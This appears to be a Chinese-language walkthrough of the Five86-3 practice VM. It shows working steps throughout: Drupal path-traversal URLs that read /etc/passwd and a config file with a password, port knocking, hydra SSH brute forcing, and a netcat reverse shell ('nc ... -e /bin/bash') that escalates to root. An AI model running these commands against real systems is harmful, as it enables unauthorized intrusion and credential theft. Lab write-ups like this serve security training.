Five86-3靶机测试记录

靶机信息

靶机下载地址：​​https://www.five86.com/five86-3.html​​

下载好靶机解压后，直接打开文件夹里的.ova文件即可

将靶机设置为NAT模式后，kali和靶机为同一网段

信息搜集

使用nmap扫描同网段的信息，筛选出目标ip地址

nmap -sn 192.168.74.0/24

对目标主机做进一步的扫描

信息比较少，只有一个80端口的信息

nmap -A 192.168.74.138

漏洞利用

访问网站发现为drupal站点，版本为drupal 7，但是没有具体的版本号

搜了下漏洞，试了几个sql注入和rce发现用不了

最后是发现有个目录遍历的漏洞

查看利用方法

根据漏洞文档的内容构造url如下，读取到passwd内容

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd

构造url查看drupal配置文件路径

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../var/www/html/sites/default/settings.php

查看源代码看起来方便些，找到个密码x4lB0XxX，但是缺少用户名

根据passwd文件中的/bin/bash可以判断有4个可登录的用户

使用用户名和密码尝试登录站点，都失败了，密码可能不是站点的

passwd文件里发现了有sshd账号，可能有过滤的措施导致扫描的时候没有发现

现在只能查看文件没法使用命令，无法确定是什么进程导致扫描不到端口

这时候可以通过查看cpu任务调度的文件来查看进程

发现一个特殊的进程knockd，需要指定的方式才能访问到端口，也叫端口敲门

http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../proc/sched_debug

查看knockd进程配置文件，需要依次向22端口发送5004,4284,6872

view-source:http://192.168.74.138/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/knockd.conf

使用nmap敲击端口，再次扫描22端口后为开放状态

for x in 5004 4284 6872;do nmap -Pn --max-retries 0 -p $x 192.168.74.138;done

把用户名写到文本中当做用户名字典，然后进行暴破，发现为sam账户的密码

hydra -L user.txt -p x4lB0XxX -t 5 -v ssh://192.168.74.138

权限提升

登录到sam账户

ssh -l sam 192.168.74.138

sudo -l发现有个脚本文件，是一个重启apache的脚本

有编辑权限，可以尝试反弹shell到kali上

sudo执行脚本后获取到管理权限，不sudo执行的话脚本无法执行，而且弹上去还是普通用户权限

nc 192.168.74.129 666 -e /bin/bash
nc -lvp 666

最后在root目录下获取到flag